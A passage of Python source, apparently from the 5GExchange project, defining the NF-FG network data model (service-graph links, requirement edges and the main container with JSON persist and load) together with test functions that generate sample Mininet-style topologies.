tag_info=None,
delay=None, bandwidth=None, constraints=None,
additional_actions=None):
"""
Init.
:param additional_actions: not traffic steering actions in a flowrule.
:type additional_actions: str
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param id: optional id
:type id: str or int
:param flowclass: flowclass of SG next hop link a.k.a a match
:type flowclass: str
:param tag_info: tag info
:type tag_info: str
:param delay: requested delay on the SG next hop
:type delay: float
:param bandwidth: requested bandwidth on the SG next hop
:type bandwidth: float
:param constraints: optional Constraints object
:type constraints: :class:`Constraints`
:param additional_actions: additional actions
:type additional_actions: str
:return: None
"""
super(EdgeSGLink, self).__init__(src=src, dst=dst, type=Link.SG, id=id,
constraints=constraints)
self.flowclass = flowclass # flowrule without action
self.tag_info = tag_info
self.delay = delay
self.bandwidth = bandwidth
self.additional_actions = additional_actions
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeSGLink, self).persist()
if self.flowclass is not None:
link["flowclass"] = self.flowclass
if self.tag_info is not None:
link["tag_info"] = self.tag_info
if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
if self.additional_actions is not None:
link["additional_actions"] = self.additional_actions
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_sg_nexthops:
if link.id == data['id']:
raise RuntimeError(
"ID conflict during EdgeSGLink loading: %s" % link.id)
super(EdgeSGLink, self).load(data=data, container=container)
self.flowclass = data.get('flowclass')
self.tag_info = data.get('tag_info')
self.additional_actions = data.get('additional_actions')
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "SGLink(id: %s, src: %s[%s], dst: %s[%s], tag: %s, delay: %s, " \
"bandwidth: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.tag_info, self.delay, self.bandwidth)
class EdgeReq(Link):
"""
Class for constraint of networking parameters between SG elements.
Class for requirements between arbitrary NF modes.
"""
__slots__ = ('delay', 'bandwidth', 'sg_path')
def __init__ (self, src=None, dst=None, id=None, delay=None, bandwidth=None,
sg_path=None):
"""
Init.
:param src: source port
:type src: :any:`Port`
:param dst: destination port
:type dst: :any:`Port`
:param id: optional id
:type id: str or int
:param delay: delay resource
:type delay: float
:param bandwidth: bandwidth resource
:type bandwidth: float
:param sg_path: list of ids of sg_links represents end-to-end requirement
:type sg_path: list ot tuple
:return: None
"""
super(EdgeReq, self).__init__(src=src, dst=dst, type=Link.REQUIREMENT,
id=id)
self.delay = delay # optional
self.bandwidth = bandwidth # optional
# Set sg_path types according to given param type
if isinstance(sg_path, basestring):
self.sg_path = [str(sg_path), ]
elif isinstance(sg_path, Iterable):
self.sg_path = [p for p in sg_path]
elif sg_path is None:
self.sg_path = []
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
link = super(EdgeReq, self).persist()
if self.delay is not None:
link["delay"] = self.delay
if self.bandwidth is not None:
link["bandwidth"] = self.bandwidth
sg_path = self.sg_path[:]
if sg_path:
link['sg_path'] = sg_path
return link
def load (self, data, container=None, *args, **kwargs):
"""
Instantiate object from JSON.
:param data: JSON data
:type data: dict
:param container: main container object
:type container: :any:`NFFGModel`
:return: None
"""
if container is None:
raise RuntimeError(
"Container reference is not given for edge endpoint lookup!")
for link in container.edge_reqs:
if link.id == data['id']:
raise RuntimeError("ID conflict during EdgeReq loading: %s" % link.id)
super(EdgeReq, self).load(data=data, container=container)
self.delay = float(data['delay']) if 'delay' in data else None
self.bandwidth = float(data['bandwidth']) if 'bandwidth' in data else None
if 'sg_path' in data:
self.sg_path = data['sg_path']
return self
def __str__ (self):
"""
Return with string representation.
:return: string representation
:rtype: str
"""
return "ReqLink(id: %s, src: %s[%s], dst: %s[%s], path: %s, delay:%s, " \
"bandwidth: %s)" % (
self.id, self.src.node.id, self.src.id, self.dst.node.id,
self.dst.id, self.sg_path, self.delay, self.bandwidth)
################################################################################
# --------========== MAIN CONTAINER STARTS HERE =========-------------
################################################################################
class NFFGParseError(RuntimeError):
"""
Exception class for specific parsing errors.
"""
pass
class NFFGModel(Element):
"""
Wrapper class for a single NF-FG.
Network Function Forwarding Graph (NF-FG) data model.
"""
# Default version
VERSION = "1.0"
"""Default version"""
# Namespace
NAMESPACE = "http://csikor.tmit.bme.hu/netconf/unify/nffg"
"""Namespace"""
# prefix
PREFIX = "nffg"
"""prefix"""
# Organization
ORGANIZATION = "BME-TMIT"
"""Organization"""
# Description
DESCRIPTION = "Network Function Forwarding Graph (NF-FG) data model"
"""Description"""
# Container type
TYPE = "NFFG"
__slots__ = ('name', 'service_id', 'version', 'metadata', 'mode', 'node_nfs',
'node_saps', 'node_infras', 'edge_links', 'edge_sg_nexthops',
'edge_reqs')
def __init__ (self, id=None, name=None, service_id=None, metadata=None,
mode=None, status=None, version=None):
"""
Init.
:param id: optional NF-FG identifier (generated by default)
:type id: str or int
:param name: optional NF-FG name
:type name: str
:param service_id: service id this NFFG is originated from
:type service_id: str or int
:param version: optional version (default: 1.0)
:type version: str
:return: None
"""
super(NFFGModel, self).__init__(id=id, type=self.TYPE, status=status)
self.name = name
self.service_id = service_id
self.version = version if version is not None else self.VERSION
self.metadata = OrderedDict(metadata if metadata else ())
self.mode = mode
self.node_nfs = []
self.node_saps = []
self.node_infras = []
self.edge_links = []
self.edge_sg_nexthops = []
self.edge_reqs = []
@property
def nodes (self):
"""
Return all the node in the Container as a list.
:return: nodes
:rtype: list
"""
# shallow copy
nodes = self.node_nfs[:]
nodes.extend(self.node_saps)
nodes.extend(self.node_infras)
return nodes
@property
def edges (self):
"""
Return all the edges in the Container as a list.
:return: edges
:rtype: list
"""
# shallow copy
edges = self.edge_links[:]
edges.extend(self.edge_reqs)
edges.extend(self.edge_sg_nexthops)
return edges
def get_port (self, node_id, port_id):
"""
Return the Port reference according to the given Node and Port ids.
:param node_id: node id
:type node_id: str
:param port_id: port id
:type port_id: str
:return: port object
:rtype: :any:`Port`
"""
for node in self.nodes:
if node.id == node_id:
for port in node.ports:
if port.id == port_id:
return port
return None
def add_nf (self, **kwargs):
"""
Create and store a NF Node with the given parameters.
:return: the created NF
:rtype: :any:`NodeNF`
"""
nf = NodeNF(**kwargs)
for node in self.node_nfs:
if node.id == nf.id:
raise RuntimeError(
"NodeNF with id: %s already exist in the container!" % node.id)
self.node_nfs.append(nf)
return nf
def del_nf (self, id):
"""
Remove the NF Node with the given id.
:param id: NF id
:param id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_nfs:
if node.id == id:
self.node_nfs.remove(node)
return True
def add_sap (self, **kwargs):
"""
Create and store a SAP Node with the given parameters.
:return: the created SAP
:rtype: :any:`NodeSAP`
"""
sap = NodeSAP(**kwargs)
for node in self.node_saps:
if node.id == sap.id:
raise RuntimeError(
"NodeNF with id: %s already exist in the container!" % node.id)
self.node_saps.append(sap)
return sap
def del_sap (self, id):
"""
Remove the SAP Node with the given id.
:param id: SAP id
:param id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_saps:
if node.id == id:
self.node_saps.remove(node)
return True
def add_infra (self, **kwargs):
"""
Create and store an Infrastructure Node with the given parameters.
:return: the created Infra
:rtype: :any:`NodeInfra`
"""
infra = NodeInfra(**kwargs)
for node in self.node_infras:
if node.id == infra.id:
raise RuntimeError(
"NodeNF with id: %s already exist in the container!" % node.id)
self.node_infras.append(infra)
return infra
def del_infra (self, id):
"""
Remove Infrastructure Node with the given id.
:param id: Infra id
:param id: str
:return: the actual Node is found and removed or not
:rtype: bool
"""
for node in self.node_infras:
if node.id == id:
self.node_infras.remove(node)
return True
def add_link (self, src, dst, **kwargs):
"""
Create and store a Link Edge with the given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the created edge
:rtype: :any:`EdgeLink`
"""
link = EdgeLink(src=src, dst=dst, **kwargs)
for edge in self.edge_links:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeLink with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
self.edge_links.append(link)
return link
def del_link (self, src, dst):
"""
Remove Link Edge with given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_links:
if edge.src.id == src.id and edge.dst.id == dst.id:
self.edge_links.remove(edge)
return True
def add_sg_hop (self, src, dst, **kwargs):
"""
Create and store an SG next hop Edge with the given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the created edge
:rtype: :any:`EdgeSGLink`
"""
hop = EdgeSGLink(src=src, dst=dst, **kwargs)
for edge in self.edge_sg_nexthops:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeSGLink with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
self.edge_sg_nexthops.append(hop)
return hop
def del_sg_hop (self, src, dst):
"""
Remove SG next hop Edge with given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_sg_nexthops:
if edge.src.id == src.id and edge.dst.id == dst.id:
self.edge_sg_nexthops.remove(edge)
return True
def add_req (self, src, dst, **kwargs):
"""
Create and store a Requirement Edge with the given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the created edge
:rtype: :any:`EdgeReq`
"""
req = EdgeReq(src=src, dst=dst, **kwargs)
for edge in self.edge_reqs:
if edge.src.id == src.id and edge.dst.id == dst.id:
raise RuntimeError(
"EdgeReq with src(%s) and dst(%s) endpoints already exist in the "
"container!" % (src.id, dst.id))
self.edge_sg_nexthops.append(req)
return req
def del_req (self, src, dst):
"""
Remove Requirement Edge with given src and dst nodes.
:param src: source node
:type src: :any:`Node`
:param dst: destination node
:type dst: :any:`Node`
:return: the actual Edge is found and removed or not
:rtype: bool
"""
for edge in self.edge_reqs:
if edge.src.id == src.id and edge.dst.id == dst.id:
self.edge_sg_nexthops.remove(edge)
return True
def persist (self):
"""
Persist object.
:return: JSON representation
:rtype: dict
"""
super(NFFGModel, self).persist()
nffg = OrderedDict(parameters=OrderedDict(id=self.id))
if self.name is not None:
nffg["parameters"]["name"] = self.name
if self.service_id is not None:
nffg["parameters"]["service_id"] = self.service_id
nffg["parameters"]["version"] = self.version
if self.metadata:
nffg["parameters"]["metadata"] = self.metadata
if self.mode:
nffg['parameters']['mode'] = self.mode
if self.node_nfs:
nffg["node_nfs"] = [nf.persist() for nf in self.node_nfs]
if self.node_saps:
nffg["node_saps"] = [sap.persist() for sap in self.node_saps]
if self.node_infras:
nffg["node_infras"] = [infra.persist() for infra in self.node_infras]
if self.edge_links:
nffg["edge_links"] = [link.persist() for link in self.edge_links]
if self.edge_sg_nexthops:
nffg["edge_sg_nexthops"] = [sg.persist() for sg in self.edge_sg_nexthops]
if self.edge_reqs:
nffg["edge_reqs"] = [req.persist() for req in self.edge_reqs]
return nffg
def load (self, raw_data, *args, **kwargs):
"""
Read the given JSON object structure and try to convert to an NF-FG
representation as an :any:`NFFGModel`.
:param raw_data: raw date in JSON
:type raw_data: str
:return: the constructed NF-FG representation
:rtype: :any:`NFFGModel`
"""
# Converter function to avoid unicode
def unicode_to_str (input):
"""
Converter function to avoid unicode.
:param input: data part
:type input: unicode
:return: converted data
:rtype: str
"""
if isinstance(input, dict):
return OrderedDict(
[(unicode_to_str(key), unicode_to_str(value)) for key, value in
input.iteritems()])
elif isinstance(input, list):
return [unicode_to_str(element) for element in input]
elif isinstance(input, unicode):
# return input.encode('utf-8').replace(' ', '_')
return input.encode('utf-8')
else:
return input
try:
# Load from plain text
data = json.loads(raw_data, object_hook=unicode_to_str)
# Create container and fill container fields
container = NFFGModel(
id=data['parameters'].get('id'), # mandatory
name=data['parameters'].get('name'), # can be None
service_id=data['parameters'].get('service_id'), # can be None
metadata=data['parameters'].get('metadata'),
mode=data['parameters'].get('mode'),
status=data['parameters'].get('status'),
version=data['parameters'].get('version')) # mandatory
# Fill Container lists
for n in data.get('node_nfs', ()):
container.node_nfs.append(NodeNF.parse(data=n))
for n in data.get('node_saps', ()):
container.node_saps.append(NodeSAP.parse(data=n))
for n in data.get('node_infras', ()):
container.node_infras.append(NodeInfra.parse(data=n))
for e in data.get('edge_links', ()):
container.edge_links.append(EdgeLink.parse(data=e, container=container))
for e in data.get('edge_sg_nexthops', ()):
container.edge_sg_nexthops.append(
EdgeSGLink().parse(data=e, container=container))
for e in data.get('edge_reqs', ()):
container.edge_reqs.append(EdgeReq.parse(data=e, container=container))
except KeyError as e:
raise RuntimeError("Not a valid NFFGModel format!", e)
except ValueError as e:
raise NFFGParseError("Parsed data is not valid JSON: %s" % e)
return container
def dump (self):
"""
Dump the container in plain text based on JSON structure.
:return: NF-FG representation as plain text
:rtype: str
"""
return json.dumps(self.persist(), indent=2, sort_keys=False)
```
#### File: 5GExchange/nffg/nffg_tests.py
```python
import sys
from nffg import *
DOMAIN_INTERNAL = "INTERNAL"
DOMAIN_SDN = "SDN"
def test_parse_load ():
# NF
nf = NodeNF()
nf.id = "nf1"
nf.name = "NetworkFunction1"
nf.functional_type = "functype1"
nf.deployment_type = "virtual"
nf.resources.cpu = "10"
nf.resources.mem = "1"
nf.resources.storage = "10"
nf.resources.bandwidth = "2"
nf.resources.delay = "2"
# nf.add_port("port_nf1", "port1", "virtual", "vlan:1025")
p1 = nf.add_port(id="port_nf1",
properties={"port1": 42, "virtual": 24, "vlan": 1025})
# SAP
sap = NodeSAP()
sap.id = "sap1"
sap.name = "sap1"
p2 = sap.add_port(id="port_sap")
# Infra
infra = NodeInfra()
infra.id = "infra1"
infra.operation = Element.OP_CREATE
infra.name = "BisBis1"
infra.domain = "virtual"
infra.resources.cpu = "20"
infra.resources.mem = "2"
infra.resources.storage = "20"
infra.resources.bandwidth = "4"
infra.add_metadata("meta1", "lorem")
infra.add_metadata("meta2", "ipsum")
# infra.add_supported_type("functype1")
infra.add_supported_type(("functype1", "functype2", "functype3"))
# infra.resources.delay = "4"
p3 = port_infra = infra.add_port(id="port_infra")
port_infra.add_flowrule("match123", "action456")
# Edge link
edge_link = EdgeLink(p2, p3, id="link3")
edge_link.bandwidth = "100"
edge_link.delay = "5"
edge_link.backward = True
edge_link.operation = Element.OP_DELETE
# Edge SG next hop
edge_sg = EdgeSGLink(p1, p2, id="link1")
edge_sg.flowclass = "flowclass1"
# Edge requirement
edge_req = EdgeReq(p2, p3)
edge_req.id = "link2"
edge_req.bandwidth = "100"
edge_req.delay = "5"
edge_req.sg_path.append(edge_sg.id)
edge_req.sg_path.append(edge_link.id)
# Generate
nffg = NFFGModel()
nffg.name = "NFFG1"
nffg.metadata['lorem'] = 'ipsum'
nffg.node_infras.append(infra)
nffg.node_nfs.append(nf)
nffg.node_saps.append(sap)
nffg.edge_links.append(edge_link)
nffg.edge_sg_nexthops.append(edge_sg)
nffg.edge_reqs.append(edge_req)
data = nffg.dump()
print "\nGenerated NF-FG:"
print data
nffg2 = NFFGModel.parse(data)
print "\nParsed NF-FG:"
print nffg2.dump()
return nffg
def test_NFFG ():
# Add nodes
nffg = NFFG(id="BME-001")
infra = nffg.add_infra(id="node0", name="INFRA0")
sap0 = nffg.add_sap(id="SAP1")
sap1 = nffg.add_sap(id="SAP2")
nf1 = nffg.add_nf(id="NF1", name="NetFunc1")
nf2 = nffg.add_nf(id="NF2", name="NetFunc2")
nf3 = nffg.add_nf(id="NF3", name="NetFunc3")
# Add ports and edges
nffg.add_link(sap0.add_port(1), infra.add_port(0), id="infra_in")
nffg.add_link(sap1.add_port(1), infra.add_port(1), id="infra_out")
nffg.add_link(infra.add_port(2), nf1.add_port(1), id="nf1_in", dynamic=True)
nffg.add_link(nf1.add_port(2), infra.add_port(3), id="nf1_out", dynamic=True)
nffg.add_link(infra.add_port(4), nf2.add_port(1), id="nf2_in", dynamic=True)
nffg.add_link(nf2.add_port(2), infra.add_port(5), id="nf2_out", dynamic=True)
nffg.add_link(infra.add_port(6), nf3.add_port(1), id="nf3_in", dynamic=True)
nffg.add_link(nf3.add_port(2), infra.add_port(7), id="nf3_out", dynamic=True)
# Add SG hops
nffg.add_sglink(sap0.ports[1], nf1.ports[1], id="hop1")
nffg.add_sglink(nf1.ports[2], nf2.ports[1], id="hop2")
nffg.add_sglink(nf2.ports[2], nf3.ports[1], id="hop3")
nffg.add_sglink(nf3.ports[1], sap1.ports[1], id="hop4")
nffg.add_sglink(sap1.ports[1], sap0.ports[1], id="hop_back")
# Add req
nffg.add_req(sap0.ports[1], sap1.ports[1], id="req", delay=10, bandwidth=100)
# Dump NetworkX structure
from pprint import pprint
print "\nNetworkX:"
pprint(nffg.network.__dict__)
# Dump NFFGModel structure
print "\nNFFGModel:"
nffg_dump = nffg.dump()
print nffg_dump
# Dump tests
print "\nNFs:"
for nf in nffg.nfs:
print nf
print "\nSG next hops:"
for hop in nffg.sg_hops:
print hop
# Parse NFFG
print "\nParsed NF-FG:"
print NFFG.parse(nffg_dump).dump()
# Copy test
print "Copied NF-FG:"
# pprint(nffg.copy().network.__dict__)
pprint(copy.deepcopy(nffg).network.__dict__)
def generate_mn_topo ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="Internal-Mininet-Topology")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE2", name="ee-infra-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW3", name="switch-3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW4", name="switch-4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="mn-link1", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="mn-link2", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="mn-link3", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="mn-link4", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="mn-link5", **link_res)
nffg.add_link(sw4.add_port(4), sap14.add_port(1), id="mn-link6", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_mn_topo2 ():
# Create NFFG
nffg = NFFG(id="INTERNAL2", name="Internal-Mininet-Topology2")
# Add environments
ee1 = nffg.add_infra(id="EE11", name="ee-infra-11", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE12", name="ee-infra-12", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW13", name="switch-13", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW14", name="switch-14", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP3", name="SAP3")
sap2 = nffg.add_sap(id="SAP4", name="SAP4")
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap14.domain = "eth0"
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="mn-link11", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="mn-link12", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="mn-link13", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="mn-link14", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="mn-link15", **link_res)
nffg.add_link(sw4.add_port(4), sap14.add_port(1), id="mn-link16", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_dynamic_fallback_nffg ():
nffg = NFFG(id="DYNAMIC-FALLBACK-TOPO", name="fallback-dynamic")
nc1 = nffg.add_infra(id="nc1", name="NC1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc1.add_supported_type(['A', 'B'])
nc2.add_supported_type(['A', 'C'])
s3 = nffg.add_infra(id="s3", name="S3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
s4 = nffg.add_infra(id="s4", name="S4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(nc1.add_port(1), s3.add_port(1), id="l1", **linkres)
nffg.add_link(nc2.add_port(1), s4.add_port(1), id="l2", **linkres)
nffg.add_link(s3.add_port(2), s4.add_port(2), id="l3", **linkres)
nffg.add_link(s3.add_port(3), sap1.add_port(1), id="l4", **linkres)
nffg.add_link(s4.add_port(3), sap2.add_port(1), id="l5", **linkres)
nffg.duplicate_static_links()
return nffg
def generate_static_fallback_topo ():
nffg = NFFG(id="STATIC-FALLBACK-TOPO", name="fallback-static")
s1 = nffg.add_infra(id="s1", name="S1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s2 = nffg.add_infra(id="s2", name="S2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s3 = nffg.add_infra(id="s3", name="S3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
s4 = nffg.add_infra(id="s4", name="S4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
nffg.add_link(s1.add_port(1), s3.add_port(1), id="l1")
nffg.add_link(s2.add_port(1), s4.add_port(1), id="l2")
nffg.add_link(s3.add_port(2), s4.add_port(2), id="l3")
nffg.add_link(s3.add_port(3), sap1.add_port(1), id="l4")
nffg.add_link(s4.add_port(3), sap2.add_port(1), id="l5")
nffg.duplicate_static_links()
return nffg
def generate_one_bisbis ():
nffg = NFFG(id="1BiSBiS", name="One-BiSBiS-View")
bb = nffg.add_infra(id="1bisbis", name="One-BiSBiS",
domain=NFFG.DEFAULT_DOMAIN,
infra_type=NFFG.TYPE_INFRA_BISBIS)
# FIXME - very basic heuristic for virtual resource definition
# bb.resources.cpu = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.mem = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.storage = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.delay = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
# bb.resources.bandwidth = min((infra.resources.cpu for infra in
# self.global_view.get_resource_info().infras))
bb.resources.cpu = sys.maxint
bb.resources.mem = sys.maxint
bb.resources.storage = sys.maxint
bb.resources.delay = 0
bb.resources.bandwidth = sys.maxint
sap1 = nffg.add_sap(id="sap1", name="SAP1")
sap2 = nffg.add_sap(id="sap2", name="SAP2")
nffg.add_link(sap1.add_port(1), bb.add_port(1), id='link1')
nffg.add_link(sap2.add_port(1), bb.add_port(2), id='link2')
nffg.duplicate_static_links()
return nffg
def generate_mn_test_req ():
test = NFFG(id="SG-decomp", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_mn_test_req2 ():
test = NFFG(id="SG-decomp", name="SG-name")
sap1 = test.add_sap(name="SAP3", id="sap3")
sap2 = test.add_sap(name="SAP4", id="sap4")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_mn_req_hackathon ():
test = NFFG(id="SG-hackathon", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap3 = test.add_sap(name="SAP3", id="sap3")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap3.add_port(1), id=3)
test.add_sglink(sap3.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap3.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap3.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def gen ():
nffg = NFFG(id="SG-decomp", name="SG-name")
sap1 = nffg.add_sap(name="SAP1", id="sap1")
sap2 = nffg.add_sap(name="SAP2", id="sap2")
nc1 = nffg.add_infra(id="nc1", name="NC1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
nc2 = nffg.add_infra(id="nc2", name="NC2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
comp = nffg.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=2, mem=2, storage=0)
decomp = nffg.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=2, mem=2, storage=0)
linkres = {'delay': 1.5, 'bandwidth': 2000}
nffg.add_link(sap1.add_port(1), nc1.add_port(1), id="l1", **linkres)
nffg.add_link(nc1.add_port(2), nc2.add_port(2), id="l2", **linkres)
nffg.add_link(nc2.add_port(1), sap2.add_port(1), id="l3", **linkres)
nffg.duplicate_static_links()
nffg.add_undirected_link(nc1.add_port(), comp.add_port(1), dynamic=True)
nffg.add_undirected_link(nc1.add_port(), comp.add_port(2), dynamic=True)
